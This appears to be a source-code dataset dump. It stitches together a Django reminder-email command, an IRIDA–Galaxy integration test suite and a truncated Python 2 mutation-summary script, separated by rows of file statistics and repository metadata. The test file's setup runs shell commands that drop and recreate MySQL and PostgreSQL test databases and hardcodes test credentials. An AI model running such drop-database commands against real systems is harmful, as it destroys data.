    from_address = "reminder@sovol.moe"

    def handle(self, *args, **options):
        """Mail reminders for events starting tomorrow and for frames whose
        sign-up deadline falls tomorrow (skipping events already reminded)."""
        self.stdout.write("running...")

        # Midnight today, local timezone; "tomorrow" is the half-open 24h
        # window [today + 1 day, today + 2 days).
        today = datetime.datetime.combine(
            datetime.date.today(),
            datetime.time(0, 0, tzinfo=timezone.LocalTimezone())
        )
        window_start = today + datetime.timedelta(days=1)
        window_end = today + datetime.timedelta(days=2)

        # Events that start tomorrow: remind every participant.
        reminder_template = get_template("email/reminder.txt")
        reminder_events = Event.objects.filter(
            start_time__gte=window_start,
            start_time__lt=window_end,
        )
        for event in reminder_events:
            for user in event.participant.all():
                send_template_mail(
                    reminder_template,
                    {'user': user, 'event': event},
                    self.from_address,
                    [user.email]
                )

        # Frames closing tomorrow: remind participants, unless the event was
        # already covered by the start-time reminder above.
        deadline_template = get_template("email/deadline.txt")
        deadline_frames = Frame.objects.filter(
            deadline__gte=window_start,
            deadline__lt=window_end,
        )
        for frame in deadline_frames:
            if frame.event not in reminder_events:
                for user in frame.participant.all():
                    send_template_mail(
                        deadline_template,
                        {'user': user, 'event': frame.event},
                        self.from_address,
                        [user.email]
                    )

        self.stdout.write("success...!")
34.103448
66
0.58999
202
1,978
5.623762
0.361386
0.068662
0.077465
0.091549
0.257042
0.204225
0.056338
0
0
0
0
0.006598
0.310415
1,978
57
67
34.701754
0.826246
0.010617
0
0.122449
0
0
0.093095
0.034271
0
0
0
0
0
1
0.020408
false
0
0.163265
0
0.244898
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f8789335127ad626aebedbfb8f6b1f855bca1b
18,797
py
Python
irida_import/tests/integration/test_irida_import_int.py
phac-nml/irida-galaxy-importer
8b85bad43272d523f6b0cf50d9fcce355d3b966e
[ "Apache-2.0" ]
6
2015-11-24T21:51:54.000Z
2022-03-09T15:08:52.000Z
irida_import/tests/integration/test_irida_import_int.py
phac-nml/irida-galaxy-importer
8b85bad43272d523f6b0cf50d9fcce355d3b966e
[ "Apache-2.0" ]
16
2016-11-22T14:20:15.000Z
2021-12-20T21:28:28.000Z
irida_import/tests/integration/test_irida_import_int.py
phac-nml/irida-galaxy-importer
8b85bad43272d523f6b0cf50d9fcce355d3b966e
[ "Apache-2.0" ]
2
2019-07-12T20:10:30.000Z
2019-09-26T20:52:17.000Z
"""Integration tests for the IRIDA -> Galaxy import tool.

NOTE(review): these tests spawn real IRIDA/Galaxy processes and drive a real
browser via Selenium; they require network access and the repos checked out
under tests/integration/repos.
"""
import socket
import getpass
import inspect
import time
import sys
import logging
import os
import configparser
import pytest
import subprocess
from tempfile import mkdtemp
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from ...irida_import import IridaImport
from . import util
from requests_oauthlib import OAuth2Session
from oauthlib.oauth2 import LegacyApplicationClient
from bioblend import galaxy

# These variables are to stop Galaxy and Irida from being changed
# during script execution. This is required if you are using your
# own instance of Galaxy and Irida.
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_INSTALL'] = "1"
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_GALAXY'] = "1"
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_STOP_GALAXY'] = "1"
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_IRIDA'] = "1"


class TestIridaImportInt:
    """
    Perform integration tests on the IRIDA import tool for Galaxy

    To use an already running instance of Galaxy on port 8888,
    installation must be disabled, in addition to Galaxy starting/stopping
    """

    TIMEOUT = 600  # seconds
    GALAXY_SLEEP_TIME = 360

    USER = getpass.getuser()
    EMAIL = 'irida@irida.ca'
    GALAXY_PASSWORD = 'Password1'
    GALAXY_DOMAIN = 'localhost'
    GALAXY_CMD = ['bash', 'run.sh', '--daemon']
    GALAXY_STOP = ['bash', 'run.sh', '--stop-daemon']
    GALAXY_DB_RESET = 'echo "drop database if exists galaxy_test; create database galaxy_test;" | psql'

    IRIDA_DOMAIN = 'localhost'
    IRIDA_PORT = 8080
    IRIDA_URL = 'http://' + IRIDA_DOMAIN + ':' + str(IRIDA_PORT)
    IRIDA_CMD = ['mvn', 'clean', 'jetty:run',
                 '-Djdbc.url=jdbc:mysql://localhost:3306/irida_test',
                 '-Djdbc.username=test', '-Djdbc.password=test',
                 '-Dliquibase.update.database.schema=true',
                 '-Dhibernate.hbm2ddl.auto=',
                 '-Dhibernate.hbm2ddl.import_files=']
    IRIDA_STOP = 'mvn jetty:stop'
    IRIDA_DB_RESET = 'echo ' \
        '"drop database if exists irida_test;' \
        'create database irida_test;' \
        '"| mysql -u test -ptest'
    IRIDA_PASSWORD_ID = 'password_client'
    IRIDA_AUTH_CODE_ID = 'auth_code_client'
    IRIDA_REDIRECT_URI = IRIDA_URL + '/galaxy/auth_code'
    IRIDA_USER = 'admin'
    IRIDA_PASSWORD = 'Password1!'
    IRIDA_TOKEN_ENDPOINT = IRIDA_URL + '/api/oauth/token'
    IRIDA_PROJECTS = IRIDA_URL + '/api/projects'
    IRIDA_GALAXY_MODAL = 'galaxy-modal'
    WAIT = 120
    INSTALL_EXEC = 'install.sh'

    # Sequence files accessed by IRIDA's REST API will not exist when the
    # tool attempts to access them if they were not uploaded as valid sequence
    # files
    FASTQ_CONTENTS = (
        "@SRR566546.970 HWUSI-EAS1673_11067_FC7070M:4:1:2299:1109 length=50\n" +
        "TTGCCTGCCTATCATTTTAGTGCCTGTGAGGTGGAGATGTGAGGATCAGT\n" +
        "+SRR566546.970 HWUSI-EAS1673_11067_FC7070M:4:1:2299:1109 length=50\n" +
        "hhhhhhhhhhghhghhhhhfhhhhhfffffe`ee[`X]b[d[ed`[Y[^Y")

    def setup_class(self):
        """Initialize class variables, install IRIDA, Galaxy, and the tool"""
        module_dir = os.path.dirname(os.path.abspath(__file__))
        self.SCRIPTS = os.path.join(module_dir, 'bash_scripts')
        self.REPOS_PARENT = module_dir
        self.REPOS = os.path.join(module_dir, 'repos')
        self.TOOL_DIRECTORY = os.path.dirname(inspect.getfile(IridaImport))
        self.CONFIG_PATH = os.path.join(self.TOOL_DIRECTORY, 'tests',
                                        'integration', 'repos', 'galaxy',
                                        'tools', 'irida-galaxy-importer',
                                        'irida_import', 'config.ini')
        self.GALAXY = os.path.join(self.REPOS, 'galaxy')
        self.IRIDA = os.path.join(self.REPOS, 'irida')

        # Debug-level logging mirrored to stdout for the whole test run.
        log = logging.getLogger()
        log.setLevel(logging.DEBUG)
        log_out = logging.StreamHandler(sys.stdout)
        log_out.setLevel(logging.DEBUG)
        formatter = logging.Formatter(
            '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        log_out.setFormatter(formatter)
        log.addHandler(log_out)
        self.log = log

        try:
            os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_INSTALL']
            self.GALAXY_PORT = 8080
            self.GALAXY_URL = 'http://' + self.GALAXY_DOMAIN + ':' + str(
                self.GALAXY_PORT)
        except KeyError:
            # No install opt-out: pick a free ephemeral port for Galaxy.
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.bind(('', 0))
            self.GALAXY_PORT = sock.getsockname()[1]
            self.GALAXY_URL = 'http://' + self.GALAXY_DOMAIN + ':' + str(
                self.GALAXY_PORT)

            # Install IRIDA, Galaxy, and the IRIDA export tool:
            exec_path = os.path.join(self.SCRIPTS, self.INSTALL_EXEC)
            install = subprocess.Popen([exec_path, self.TOOL_DIRECTORY,
                                        str(self.GALAXY_PORT)],
                                       cwd=self.REPOS_PARENT)
            install.wait()  # Block untill installed

    @pytest.fixture(scope='class')
    def driver(self, request):
        """Set up the Selenium WebDriver"""
        driver = webdriver.Chrome()
        driver.implicitly_wait(1)
        driver.set_window_size(1024, 768)

        def finalize_driver():
            driver.quit()
        request.addfinalizer(finalize_driver)
        return driver

    @pytest.fixture(scope='class')
    def setup_irida(self, request, driver):
        """Set up IRIDA for tests (Start if required, register, log in)"""
        def stop_irida():
            print('Stopping IRIDA nicely')
            stopper = subprocess.Popen(self.IRIDA_STOP, cwd=self.IRIDA,
                                       shell=True)
            stopper.wait()

        try:
            os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_IRIDA']
        except KeyError:
            stop_irida()

            # create temporary directories for IRIDA data
            data_dir = mkdtemp(prefix='irida-tmp-')
            sequence_file_dir = mkdtemp(prefix='sequence-files-', dir=data_dir)
            reference_file_dir = mkdtemp(prefix='reference-files-',
                                         dir=data_dir)
            output_file_dir = mkdtemp(prefix='output-files-', dir=data_dir)
            self.IRIDA_CMD.append('-Dsequence.file.base.directory=' +
                                  sequence_file_dir)
            self.IRIDA_CMD.append('-Dreference.file.base.directory=' +
                                  reference_file_dir)
            self.IRIDA_CMD.append('-Doutput.file.base.directory=' +
                                  output_file_dir)

            subprocess.call(self.IRIDA_DB_RESET, shell=True)
            FNULL = open(os.devnull, 'w')
            subprocess.Popen(self.IRIDA_CMD, cwd=self.IRIDA,
                             env=os.environ, stdout=FNULL)
            util.wait_until_up(self.IRIDA_DOMAIN, self.IRIDA_PORT,
                               self.TIMEOUT)

        def finalize_irida():
            stop_irida()
        request.addfinalizer(finalize_irida)

        self.register_irida(driver)
        self.add_irida_client_password(driver)
        self.add_irida_client_auth_code(driver)
        self.configure_irida_client_secret(driver)

        # Return an OAuth 2.0 authorized session with IRIDA
        return self.get_irida_oauth(driver)

    @pytest.fixture(scope='class')
    def setup_galaxy(self, request, driver):
        """Set up Galaxy for tests (Start if required, register, log in)"""
        def stop_galaxy():
            try:
                os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_STOP_GALAXY']
            except KeyError:
                print('Killing Galaxy')
                subprocess.Popen(self.GALAXY_STOP, cwd=self.GALAXY)

        try:
            os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_GALAXY']
        except KeyError:
            stop_galaxy()
            subprocess.call(self.GALAXY_DB_RESET, shell=True)
            subprocess.Popen(self.GALAXY_CMD, cwd=self.GALAXY)
            self.log.debug("Waiting for Galaxy database migration [%s]. Sleeping for [%s] seconds",
                           self.GALAXY_URL, self.GALAXY_SLEEP_TIME)
            time.sleep(self.GALAXY_SLEEP_TIME)
            self.log.debug("Galaxy database migration should have (hopefully) finished, checking if it is up")
            util.wait_until_up(
                self.GALAXY_DOMAIN,
                self.GALAXY_PORT,
                self.TIMEOUT)
            self.log.debug("Galaxy should now be up on [%s]", self.GALAXY_URL)

        def finalize_galaxy():
            stop_galaxy()
        request.addfinalizer(finalize_galaxy)

        self.register_galaxy(driver)
        self.configure_galaxy_api_key(driver)
        self.configure_tool('Galaxy', 'galaxy_url', self.GALAXY_URL)

    def test_galaxy_configured(self, setup_galaxy, driver):
        """Verify that Galaxy is accessible"""
        driver.get(self.GALAXY_URL)

    def test_irida_configured(self, setup_irida, driver):
        """Verify that IRIDA is accessible"""
        driver.get(self.IRIDA_URL)

    def test_tool_visible(self, setup_galaxy, driver):
        """Make sure there is a link to the tool in Galaxy"""
        driver.get(self.GALAXY_URL)
        driver.find_element_by_xpath("//div[@id='Get Data']/a[span[contains(text(), 'Get Data')]]").click()
        assert (driver.find_element_by_xpath("//a[contains(@class, 'irida_import')]"))

    def register_galaxy(self, driver):
        """Register with Galaxy, and then attempt to log in"""
        driver.get(self.GALAXY_URL)
        driver.find_element_by_link_text("Login or Register").click()
        driver.find_element_by_id("register-toggle").click()
        driver.find_element_by_name("email").send_keys(self.EMAIL)
        driver.find_element_by_name("password").send_keys("Password1")
        driver.find_element_by_name("confirm").send_keys(
            "Password1")
        driver.find_element_by_name("username").send_keys("irida-test")
        driver.find_element_by_name("create").click()
        # Registration may fail if the account already exists; the login
        # attempt below succeeds either way.
        try:
            driver.get(self.GALAXY_URL)
            driver.find_element_by_link_text("Login or Register").click()
            driver.find_element_by_name("login").send_keys(self.EMAIL)
            driver.find_element_by_name("password").send_keys("Password1")
            driver.find_element_by_name("login").click()
        except NoSuchElementException:
            pass

    def configure_galaxy_api_key(self, driver):
        """Make a new Galaxy admin API key and configure the tool to use it"""
        gal = galaxy.GalaxyInstance(self.GALAXY_URL, email=self.EMAIL,
                                    password=self.GALAXY_PASSWORD)
        self.configure_tool('Galaxy', 'admin_key', gal.key)
        print('key:' + gal.key)

    def configure_tool(self, section, option, value):
        """Write tool configuration data"""
        config = configparser.ConfigParser()
        config.read(self.CONFIG_PATH)
        config.set(section, option, value)
        with open(self.CONFIG_PATH, 'w') as config_file:
            config.write(config_file)

    def register_irida(self, driver):
        """Register with IRIDA if neccessary, and then log in"""
        driver.get(self.IRIDA_URL)
        self.login_irida(driver, 'admin', 'password1')

        # Set a new password if necessary
        try:
            driver.find_element_by_name(
                "password").send_keys(self.IRIDA_PASSWORD)
            driver.find_element_by_name(
                "confirmPassword").send_keys(self.IRIDA_PASSWORD)
            driver.find_element_by_xpath("//button[@type='submit']").click()
        except NoSuchElementException:
            self.login_irida(driver, self.IRIDA_USER, self.IRIDA_PASSWORD)

    def login_irida(self, driver, username, password):
        """Log in to IRIDA (assumes the login page is opened by the driver)"""
        try:
            driver.find_element_by_name("username").send_keys(username)
            driver.find_element_by_name(
                "password").send_keys(password)
            driver.find_element_by_xpath("//button[@type='submit']").click()
        except NoSuchElementException:
            # If already logged in
            pass

    def add_irida_client_auth_code(self, driver):
        # Create the authorization-code OAuth client used by the tool.
        driver.get(self.IRIDA_URL + '/clients/create')
        driver.find_element_by_id("clientId").send_keys(
            self.IRIDA_AUTH_CODE_ID)
        driver.find_element_by_id('authorizedGrantTypes').click()
        driver.find_element_by_xpath(
            "//*[contains(text(), 'authorization_code')]").click()
        driver.find_element_by_name("registeredRedirectUri").send_keys(self.IRIDA_REDIRECT_URI)
        driver.find_element_by_id("scope_auto_read").click()
        driver.find_element_by_id("create-client-submit").click()

    def add_irida_client_password(self, driver):
        # Create the password-grant OAuth client used by the test session.
        driver.get(self.IRIDA_URL + '/clients/create')
        driver.find_element_by_id("clientId").send_keys(self.IRIDA_PASSWORD_ID)
        driver.find_element_by_id("scope_write").click()
        driver.find_element_by_id("create-client-submit").click()

    def get_irida_oauth(self, driver):
        # Build an OAuth2 session authenticated with the password client.
        secret = self.get_irida_secret(driver, self.IRIDA_PASSWORD_ID)
        client = LegacyApplicationClient(self.IRIDA_PASSWORD_ID)
        irida_oauth = OAuth2Session(client=client)
        irida_oauth.fetch_token(
            self.IRIDA_TOKEN_ENDPOINT,
            username=self.IRIDA_USER,
            password=self.IRIDA_PASSWORD,
            client_secret=secret)
        return irida_oauth

    def get_irida_secret(self, driver, client_id):
        """Get an IRIDA client's secret given its client ID """
        driver.get(self.IRIDA_URL + '/clients')
        driver.find_element_by_xpath(
            "//*[contains(text(), '" + client_id + "')]").click()
        secret = driver.find_element_by_id(
            'client-secret').get_attribute('textContent')
        return secret

    def configure_irida_client_secret(self, driver):
        """Configure the client secret for the tool"""
        secret = self.get_irida_secret(driver, self.IRIDA_AUTH_CODE_ID)
        # It is assumed that the tests are being run from the repo's tool
        # directory:
        self.configure_tool('IRIDA', 'client_secret', secret)

    def get_href(self, response, rel):
        """From a Requests response from IRIDA, get a href given a rel"""
        links = response.json()['resource']['links']
        href = next(link['href'] for link in links if link['rel'] == rel)
        return href

    def test_project_samples_import_single_end(self, setup_irida, setup_galaxy,
                                               driver, tmpdir):
        """Verify that sequence files can be imported from IRIDA to Galaxy"""
        irida = setup_irida
        project_name = 'ImportProjectSamples'
        project = irida.post(self.IRIDA_PROJECTS,
                             json={'name': project_name})

        samples = self.get_href(project, 'project/samples')
        sample1 = irida.post(samples, json={'sampleName': 'PS_Sample1',
                                            'sequencerSampleId': 'PS_1'})

        sequences1 = self.get_href(sample1, 'sample/sequenceFiles')

        # Pytest manages the temporary directory
        seq1 = tmpdir.join("seq1.fastq")
        seq1.write(self.FASTQ_CONTENTS)
        irida.post(sequences1, files={'file': open(str(seq1), 'rb')})
        seq2 = tmpdir.join("seq2.fastq")
        seq2.write(self.FASTQ_CONTENTS)
        irida.post(sequences1, files={'file': open(str(seq2), 'rb')})

        sample2 = irida.post(samples, json={'sampleName': 'PS_Sample2',
                                            'sequencerSampleId': 'PS_2'})
        sequences2 = self.get_href(sample2, 'sample/sequenceFiles')
        seq3 = tmpdir.join("seq3.fastq")
        seq3.write(self.FASTQ_CONTENTS)
        irida.post(sequences2, files={'file': open(str(seq3), 'rb')})

        # Export to Galaxy using the button on the dropdown menu
        driver.get(self.GALAXY_URL)
        history_panel = driver.find_element_by_id('current-history-panel')
        initially_succeeded = len(history_panel.find_elements_by_class_name(
            'state-ok'))
        driver.find_element_by_xpath("//div[@id='Get Data']/a[span[contains(text(), 'Get Data')]]").click()
        driver.find_element_by_xpath("//a[contains(@class, 'irida_import')]").click()

        # Sometimes a login is required
        try:
            self.login_irida(driver, self.IRIDA_USER, self.IRIDA_PASSWORD)
        except NoSuchElementException:
            pass

        # Pick the last matching project on this page
        driver.find_elements_by_link_text(project_name)[-1].click()

        # These checkbox elements cannot be clicked directly
        # Using IDs would complicate running the tests without restarting IRIDA
        stale = True
        timeout = 0
        while stale:
            try:
                checkboxes = driver.find_elements_by_xpath(
                    "//table[contains(@id, 'samplesTable')]/tbody/tr/td[1]/input[@type='checkbox']")
                checkboxes[0].click()
                checkboxes[1].click()
                stale = False
            except (StaleElementReferenceException, NoSuchElementException):
                # Retry for up to 60 seconds while the table re-renders.
                time.sleep(1)
                timeout += 1
                if timeout == 60:
                    raise

        driver.find_element_by_id("cart-add-btn").click()
        driver.find_element_by_id("cart-show-btn").click()

        email_input = driver.find_element_by_xpath("//form[contains(@class, 'ant-form')]//input[@type='text']")
        email_input.clear()
        email_input.send_keys(self.EMAIL)

        # Click "Export Samples to Galaxy" button
        driver.find_element_by_xpath("//button[span[text()='Export Samples to Galaxy']]").click()

        WebDriverWait(driver, self.WAIT).until(
            EC.presence_of_element_located((By.ID, 'current-history-panel'))
        )

        time.sleep(120)  # Wait for import to complete

        history_panel = driver.find_element_by_id('current-history-panel')
        succeeded = len(history_panel.find_elements_by_class_name('state-ok'))
        assert succeeded - initially_succeeded > 0, \
            "Import did not complete successfully"
42.915525
116
0.628239
2,213
18,797
5.116132
0.196114
0.035329
0.057057
0.06377
0.33298
0.270889
0.233969
0.215598
0.186804
0.15439
0
0.011421
0.264031
18,797
437
117
43.01373
0.806997
0.117466
0
0.195719
0
0.003058
0.171578
0.059177
0
0
0
0
0.006116
1
0.073395
false
0.079511
0.094801
0
0.266055
0.009174
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
99fe11a820f272f49a922eba7ff98cc3f28aaa1e
14,822
py
Python
code/sumContext.py
NIEHS/P-MACD
82fa36f6ccbdccb63985d28b0c41c9084b9e2b18
[ "MIT" ]
2
2021-06-02T20:34:27.000Z
2021-09-06T22:36:10.000Z
code/sumContext.py
NIEHS/P-MACD
82fa36f6ccbdccb63985d28b0c41c9084b9e2b18
[ "MIT" ]
null
null
null
code/sumContext.py
NIEHS/P-MACD
82fa36f6ccbdccb63985d28b0c41c9084b9e2b18
[ "MIT" ]
2
2021-04-03T00:31:13.000Z
2022-01-31T15:40:29.000Z
## This code was developed and authored by Les Klimczak, Ph.D. ## Unauthorized commercial reuse of the code and removal of this notice ## are prohibited. ## This research was supported by the Intramural Research Program of the NIH, ## National Institute of Environmental Health Sciences. import os, re, sys, copy, numpy, datetime, __builtin__ FILESDIR = sys.argv[1] execfile(sys.argv[1] + "findMotifs.py") time40 = datetime.datetime.now() def which(tf): return filter(lambda x: tf[x], range(len(tf))) #def all(tf): # return reduce(lambda x, y: x&y, tf) def duplicated(list): seen = [] duplicated = [] for el in list: if el in seen: duplicated.append(True) else: duplicated.append(False) seen.append(el) return duplicated def ifelse(test, yes, no): if test: return yes else: return no OLDEXT = "_anz4.txt" BATCH = True BATCH = False #CLUSTERANZ = True CLUSTERANZ = False if CLUSTERANZ: OLDEXT = "_cluster.txt" ORIGDIR = "/data/PCAWG_12oct_passonly/MAF_2583/histology_split/A3A_A3B/res_ytCa/" motifString = re.sub('.*/res', '', ORIGDIR)[:-1] sumTitles = ["Sample","A_T_coord_clusters", "G_C_coord_clusters", "Non_coord_clusters", "clusters","mutations", "complex","insertions", "deletions", "indels", "substitutions", "bases"] substTo = {'A':("T","G","C"),'T':("A","C","G"),'G':("C","T","A"),'C':("G","A","T")} colTitles = [] for title in findTitles: if (len(title)==1): mutBase = title else: mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]] for base in substTo[mutBase]: if (base==mutBase): continue colTitle = title + "_to_" + base colTitles.append(colTitle) colTitles.extend((title, title.lower())) if (len(title)>1): colTitles.extend((title + "_per_mut", title + "_per_" + mutBase, title.lower() + "_per_" + mutBase.lower(), "enrich_" + title, "freq_" + title, "reliable>=30")) headers = sumTitles + colTitles numCols = len(headers) totals = [0] * numCols numFixedCols = 32 def newCounter(type, subtype, sumTitle, sumSubtitle, typeColumn, typeValue, subtypeColumn, subtypeValue, 
subtypeComparison): type = type subtype = subtype sumTitle = sumTitle sumSubtitle = sumSubtitle typeColumn = typeColumn typeValue = typeValue if (typeValue[1:2]==","): typeValue = typeValue.split(",") subtypeColumn = subtypeColumn subtypeValue = subtypeValue subtypeComparison = subtypeComparison if ((subtypeComparison=="equal") or (subtypeComparison=="greater")): subtypeValue = int(subtypeValue) typeField = [0] subtypeField = [0] # 07/15/16 counters replaced with variants variants = [{}] complex = [{}] clusters = [{}] mutations = [0] mutList = [{}] baseList = [{}] baseCountList = [{}] totals = [0] * numCols output = [""] def initOutput(inputPref): if (type=='99'): typeString = "_" + sumSubtitle outputFile = inputPref + "_sum" + typeString + ".txt" else: typeString = "%02d" % int(type) outputFile = inputPref + "_sum" + typeString + subtype + ".txt" #if (file.exists(outputFile)) next output[0] = open(outputFile, "w") if (type!='99'): output[0].write("#" + sumTitle + " " + sumSubtitle + "\n") output[0].write('\t'.join(headers) + "\n") def closeOutput(): output[0].close() def initFieldNames(fieldNames): typeField[0] = which([x==typeColumn for x in fieldNames]) if (typeField[0]): typeField[0] = typeField[0][0] subtypeField[0] = which([x==subtypeColumn for x in fieldNames]) if (subtypeField[0]): subtypeField[0] = subtypeField[0][0] #print type, subtype, typeColumn, typeField[0], subtypeField[0] def initCounters(mutList0, baseList0, baseCountList0): variants[0] = {} complex[0] = {} clusters[0] = {} mutations[0] = 0 mutList[0] = copy.deepcopy(mutList0) baseList[0] = copy.deepcopy(baseList0) baseCountList[0] = copy.deepcopy(baseCountList0) def count(fields): if (sumTitle!="All Mutations"): #if (not any([x==typeValue for x in fields])): if (__builtin__.type(typeValue) is list): if (not any([x==fields[typeField[0]] for x in typeValue])): return else: if (not fields[typeField[0]]==typeValue): return if subtypeField[0]!=[]: if ((subtypeComparison=="equal") or 
(subtypeComparison=="greater")): subtypeFieldValue = int(fields[subtypeField[0]]) else: subtypeFieldValue = fields[subtypeField[0]] if (not compare(subtypeFieldValue, subtypeValue, subtypeComparison)): return #if (True): #if (type=="10"): #if ((type!="10")&(fields[typeField]!="N")) { # print lnum, type, subtype, subtypeColumn, subtypeField[0] # typeField, subtypeField #} if (not variants[0].has_key(fields[VARIANT_TYPE_FIELD]) and (fields[COMPLEX_ID_FIELD]=="")): (variants[0])[fields[VARIANT_TYPE_FIELD]] = 1 else: if (fields[COMPLEX_ID_FIELD]==""): (variants[0])[fields[VARIANT_TYPE_FIELD]] = (variants[0])[fields[VARIANT_TYPE_FIELD]] + 1 if (fields[CLUSTER_ID_FIELD]!=""): (clusters[0])[fields[CLUSTER_ID_FIELD]] = fields[CLUSTER_COORD_FIELD] if (fields[COMPLEX_ID_FIELD]!=""): (complex[0])[fields[COMPLEX_ID_FIELD]] = fields[COMPLEX_ID_FIELD] #cat("c", fields[COMPLEX_ID_FIELD], "c") # 04/15/14 change to all non-complex rows if (fields[COMPLEX_ID_FIELD]==""): mutations[0] = mutations[0]+1 if ((fields[COMPLEX_ID_FIELD]=="") and (fields[VARIANT_TYPE_FIELD]=="SNP")): # 04/15/14 change to all non-complex rows #mutations <- mutations+1 # for (title in findTitles[as.logical(as.numeric(fields[fieldNames %in% findTitles]))]) { for title in [findTitles[x] for x in which([bool(x) for x in [int(x) for x in [fields[x] for x in which([x in findTitles for x in fieldNames])]]])]: mutationCount = (mutList[0])[title][fields[TUMOR_SEQ_ALLELE2_FIELD]] (mutList[0])[title][fields[TUMOR_SEQ_ALLELE2_FIELD]] = mutationCount + 1 #baseCounts <- as.numeric(fields[fieldNames %in% countTitles]) baseCounts = [int(x) for x in [fields[x] for x in uniqueFieldNumbers]] for i in range(len(baseCounts)): (baseCountList[0])[uniqueFieldNames[i]] = (baseCountList[0])[uniqueFieldNames[i]] + baseCounts[i] else: sys.stdout.write("X") def writeSampleSum(): print " writing sample in row", lnum complex[0] = len((complex[0]).keys()) # translated ifelse won't work b/c it's trying to evaluate the False option if 
(variants[0].has_key("INS")): insertions = variants[0]["INS"] else: insertions = 0 if (variants[0].has_key("DEL")): deletions = variants[0]["DEL"] else: deletions = 0 if (variants[0].has_key("SNP")): substitutions = variants[0]["SNP"] else: substitutions = 0 # 04/15/14 change to all rows #mutations <- mutations + complex + insertions + deletions mutations[0] = mutations[0] + complex[0] coordBases = {'A':0, 'T':0, 'G':0, 'C':0, 'N':0} # iterates over keys, not values like R for key in clusters[0]: coordBases[clusters[0][key]] = coordBases[clusters[0][key]] + 1 genCounts = (coordBases["A"] + coordBases["T"], coordBases["G"] + coordBases["C"], coordBases["N"], len(clusters[0].keys()), mutations[0], complex[0], insertions, deletions, insertions+deletions, substitutions, substitutions*41) #print genCounts substCounts = [sampleID] substCounts.extend(genCounts) for title in findTitles: motifCounts = [] #print(title) if (len(title)==1): mutBase = title else: mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]] mutBaseSum = 0 #for (base in c("A", "T", "G", "C")) { for base in substTo[mutBase]: if (base==mutBase): continue baseSubstCount = mutList[0][title][base] motifCounts.extend([baseSubstCount]) mutBaseSum = mutBaseSum + baseSubstCount motifCountName = title.lower() + "_counts" totMotifCount = baseCountList[0][motifCountName] motifCounts.extend([mutBaseSum, totMotifCount]) if (len(title)==1): baseList[0][mutBase] = mutBaseSum else: mutMotifperMut = numpy.float64(mutBaseSum)/baseList[0][mutBase] totMotifperBase = numpy.float64(totMotifCount)/baseCountList[0][mutBase.lower() + "_counts"] reliable = (mutBaseSum >= 30)*1 #print mutations[0], mutBaseSum, totMotifperBase, totMotifCount motifCounts.extend((numpy.float64(mutBaseSum)/mutations[0], mutMotifperMut, totMotifperBase, numpy.float64(mutMotifperMut)/totMotifperBase, numpy.float64(mutBaseSum)/totMotifCount, reliable)) #print(motifCounts) substCounts.extend(motifCounts) totals[1:(numCols)] = [x+y for x,y in 
zip(totals[1:(numCols)], (substCounts[1:(numCols)]))] outLine = substCounts[0] + '\t' + '\t'.join([x.__str__() for x in substCounts[1:(numCols)]]) + "\n" output[0].write(outLine.replace('nan', 'NaN')) #cat(substCounts, "\n") fixedCols = 32 def writeTotals(): t = 0 for title in findTitles: if (len(title)==1): continue else: mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]] colOffset = fixedCols + t*11 titleTotals = [0]*10 titleTotals[0:5] = totals[(colOffset):(colOffset+5)] titleTotals[5] = numpy.float64(titleTotals[3])/totals[which([x=="mutations" for x in headers])[0]] titleTotals[6] = numpy.float64(titleTotals[3])/totals[which([x==mutBase for x in headers])[0]] titleTotals[7] = numpy.float64(titleTotals[4])/totals[which([x==mutBase.lower() for x in headers])[0]] titleTotals[8] = numpy.float64(titleTotals[6])/titleTotals[7] titleTotals[9] = numpy.float64(titleTotals[3])/titleTotals[4] totals[(colOffset):(colOffset+10)] = titleTotals t = t + 1 totals[0] = "Totals" outLine = "\t".join([x.__str__() for x in totals]) + "\n" output[0].write(outLine.replace('nan', 'NaN')) totals[0:(numCols)] = [0] * numCols def getValues(): return (type, subtype, sumTitle, typeValue) return {'type':type, 'getValues':getValues, 'initOutput':initOutput, 'closeOutput':closeOutput, 'initFieldNames':initFieldNames, 'initCounters':initCounters, 'count':count, 'mutList':mutList, 'writeSampleSum':writeSampleSum, 'writeTotals':writeTotals} countersList = [] #countersList[2]['getValues']() rulesFile = "SummaryRulesIntegr1.txt" # special 12/13/17 #rulesFile = "SummaryRules5d.txt" #rulesTable = read.table(rulesFile, header=TRUE, stringsAsFactors=FALSE, sep="\t") rInput = open(rulesFile, "r") line = rInput.readline() # switch(type, equal=x==y, greater=x>y, isNonBlank=(x!=""), isAny=TRUE) def compare(x, y, type): return {'equal':x==y, 'greater':x>y, 'isNonBlank':x!="", 'isAny':True}[type] sumCount = 0 while (True): line = rInput.readline().rstrip('\r\n') if (not line): break fields = 
